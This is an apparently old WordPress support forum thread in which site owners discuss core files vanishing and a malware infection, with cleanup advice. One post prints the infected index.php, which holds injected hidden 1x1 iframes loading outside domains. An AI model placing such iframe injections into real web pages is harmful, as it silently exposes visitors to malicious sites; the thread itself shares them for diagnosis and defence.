Is this malicious code at work? (7 posts)

  1. Cathy Tibbles
    Posted 7 years ago #

    A client's theme's index.php has disappeared off the server, as well as the wp-includes/default-filters.php. I'm quite stumped how this could happen! Any ideas?

  2. popper
    Posted 7 years ago #

    If you believe someone may've compromised your site, why don't you check you access and error logs?

  3. Cathy Tibbles
    Posted 7 years ago #

    I've done that. And I'm getting error messages that the files are missing. That is all. I checked to make sure that the "show errors" in php.ini was set to yes/true. But other than that, I'm not sure where else to look for these kinds of problems.

    I put the files back in. Upon signing out of the website, the files were deleted again. I've read on the forums about several ppl missing this default-filters.php, and the assumption has always been that the download was corrupted somehow. HOwever, this appears to be a different case, or the same case, ruling out the 'corrupt download' theory.

    Is there anywhere else I should check for malicious code? Anyone?

  4. Cathy Tibbles
    Posted 7 years ago #

    It's gone again!!! I reinstalled it. One day later - GONE!!! Anyone have any clue at all?

    Greatly appreciated,

  5. Gauhar Kachchhi
    Posted 7 years ago #

    Its a virul infection. I have the smae freaking problem. default-filters.php is one of the infected files. Here is what appears in my index.php file...

    /* Short and sweet */
    define('WP_USE_THEMES', true);
    echo "<iframe src=\"http://xtrarobotz.com/?click=BC0230\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
    echo "<iframe src=\"http://nipkelo.net/?click=E74A05\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
    echo "<iframe src=\"http://internetcountercheck.com/?click=14784531\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
    <iframe src="http://hotslotpot.cn/in.cgi?income65" width=1 height=1 style="visibility: hidden"></iframe>
    <iframe src="http://hotslotpot.cn/in.cgi?income66" width=1 height=1 style="visibility: hidden"></iframe>
    <iframe src="http://hotslotpot.cn/in.cgi?income67" width=1 height=1 style="visibility: hidden"></iframe>
    <iframe src="http://betworldwager.cn/in.cgi?income68" width=1 height=1 style="visibility: hidden"></iframe>
    <iframe src="http://litecartop.cn/in.cgi?income70" width=1 height=1 style="visibility: hidden"></iframe>
  6. mcbalz
    Posted 6 years ago #

    Working with a client I just discovered a similar iframe malware insert in a number of php files including wp-login.php... this one was at the first line of the files, prior to the first <?php mark.

    This was causing users who accessed the website using a PC to have their anti-virus software issue a warning... and it prevented admins from logging into the site.

    By deleting the code from a number of files via the control-panel I was able to log back in, upgrade WordPress, change the passwords for all admin-level users, and hopefully prevent further changes to the .php.

    I also deleted a subscriber account I didn't recognize and checked the MySQL database to make sure there were no stealth users.

    But I wonder whether or not this code is coming in via the web-based blog interface (i.e. using an admin-level account) or via some compromise of the hosting account? Any thoughts on this?

  7. Mark Ratledge
    Forum Moderator
    Posted 6 years ago #

    Check this thread for help with cleaning up and preventing future hacks. People do get hacked via shared hosting; from the FAQ:

    "Check with your hosting provider. The hack may have affected more than just your site, especially if you are using shared hosting. It is worth checking with your hosting provider in case they are taking steps or need to. Your hosting provider might also be able to confirm if a hack is an actual hack or a loss of service, for example."

Topic Closed

This topic has been closed to new replies.

About this Topic